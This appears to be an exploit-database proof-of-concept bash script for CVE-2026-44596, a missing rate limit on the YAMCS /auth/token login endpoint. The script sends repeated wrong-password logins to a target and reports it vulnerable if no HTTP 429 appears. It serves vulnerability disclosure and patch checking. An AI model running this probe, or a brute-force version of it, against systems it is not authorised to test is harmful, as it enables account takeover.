# Exploit Title: YAMCS yamcs-core < 5.12.7 - No Rate Limiting
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4
#!/bin/bash
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
# attempts with no rate limiting or lockout.
# Impact: Unauthenticated brute-force of any account.
# Affected: yamcs-core < 5.12.7
# Fixed in: yamcs-core 5.12.7
# CWE: CWE-307
# CVSS: 5.3 MEDIUM
# ============================================================
# Usage: ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================
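# --- Configuration -----------------------------------------------------------
# Positional arguments, each with a default:
#   $1 TARGET    base URL of the YAMCS HTTP endpoint
#   $2 USERNAME  account name used for the deliberately wrong logins
#   $3 ATTEMPTS  number of failed logins to send before giving a verdict
#
# Only POSIX sh constructs are used here: the "#!/bin/bash" line above is not
# the first line of the file, so a direct ./poc.sh may end up being run by
# /bin/sh instead of bash.

# Succeeds only when $1 is an unsigned decimal integer greater than zero.
is_positive_int() {
  case "$1" in
    '' | *[!0-9]*) return 1 ;; # empty, or contains something that is not a digit
    *[1-9]*) return 0 ;;       # digits only, at least one of them non-zero
  esac
  return 1 # digits only, but all zeros
}

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""

# The request path is appended as "/auth/token", so drop one trailing slash to
# avoid requesting "//auth/token" when the base URL was given as ".../".
TARGET="${TARGET%/}"

# ATTEMPTS drives the request loop. Without this check a non-numeric value
# makes the loop run zero times and the script finish without any verdict,
# which is easy to misread as "nothing found".
if ! is_positive_int "$ATTEMPTS"; then
  echo "[-] attempts must be a positive integer, got: '$ATTEMPTS'" >&2
  echo "    Usage: $0 [target] [username] [attempts]" >&2
  exit 2
fi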
# Run banner: echoes the effective settings and states what a vulnerable
# server looks like (a 401 for every attempt, never a 429) before any request
# is sent. One printf call emits the same ten lines as the separate echoes.
banner_rule="============================================================"
printf '%s\n' \
  "$banner_rule" \
  " CVE-2026-44596 — YAMCS No Rate Limiting PoC" \
  " Target: $TARGET" \
  " Username: $USERNAME" \
  " Attempts: $ATTEMPTS" \
  "$banner_rule" \
  "" \
  "[*] Sending $ATTEMPTS unauthenticated login attempts..." \
  "[*] Vulnerable: HTTP 401 every time, never HTTP 429" \
  ""
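# --- Probe loop and verdict --------------------------------------------------
# Sends ATTEMPTS password-grant requests that are expected to fail and records
# how the server answers each one:
#   429          -> throttling is active; stop and report PATCHED
#   200          -> the placeholder password was accepted; stop and report it
#   401          -> failed login, keep going
#   anything else (including no HTTP response) -> run is not a clean signal
#
# Limits of the check: an unbroken run of 401s only shows that no throttling
# kicked in within ATTEMPTS requests from this client. A limit with a higher
# threshold, or a lockout that keeps answering 401, would not be visible here.
all_unauthorized=1 # stays 1 only while every response so far was HTTP 401
sent=0             # number of requests actually issued

for i in $(seq 1 "$ATTEMPTS"); do
  # --data-urlencode keeps characters such as '&', '=', '+' or spaces in the
  # username from being parsed as extra form fields or altered in transit.
  # The timeouts stop an unreachable target from hanging the run.
  # curl's exit status is not checked here: when no HTTP response arrives it
  # prints 000 for %{http_code}, which is handled just below.
  RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \
    --connect-timeout 5 --max-time 15 \
    -X POST "$TARGET/auth/token" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "grant_type=password" \
    --data-urlencode "username=$USERNAME" \
    --data-urlencode "password=wrongpass$i")
  sent=$((sent + 1))
  echo " Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
  LAST_STATUS=$RESPONSE

  if [ "$RESPONSE" = "429" ]; then
    echo ""
    echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
    exit 0
  fi
  if [ "$RESPONSE" = "200" ]; then
    # A 200 here means the placeholder value "wrongpass$i" is a valid password
    # for this account, which is a finding of its own (weak credential).
    echo ""
    echo "[!!!] HTTP 200 — credentials found at attempt $i"
    exit 0
  fi

  if [ -z "$RESPONSE" ] || [ "$RESPONSE" = "000" ]; then
    # No HTTP response at all (refused, timed out, curl missing). This cannot
    # be counted as "no rate limiting": the target may be down, or something
    # in front of it may be dropping connections. Stop instead of waiting
    # through a timeout for every remaining attempt.
    all_unauthorized=0
    echo " No HTTP response from $TARGET — stopping early"
    break
  fi

  # Any other status (403, 404, 5xx, ...) means the run is not an unbroken
  # series of failed logins, so it must not end in a VULNERABLE verdict.
  [ "$RESPONSE" = "401" ] || all_unauthorized=0
done

echo ""
if [ "$sent" -eq 0 ]; then
  # seq produced nothing, e.g. because the attempts argument was not a number.
  echo "[-] INCONCLUSIVE: no attempts were sent (check the attempts argument)"
elif [ "$all_unauthorized" -eq 1 ]; then
  echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
  echo "[!!!] Brute-force possible without restriction"
else
  echo "[-] INCONCLUSIVE: got HTTP ${LAST_STATUS:-no response} instead of an unbroken run of 401s"
fi
echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"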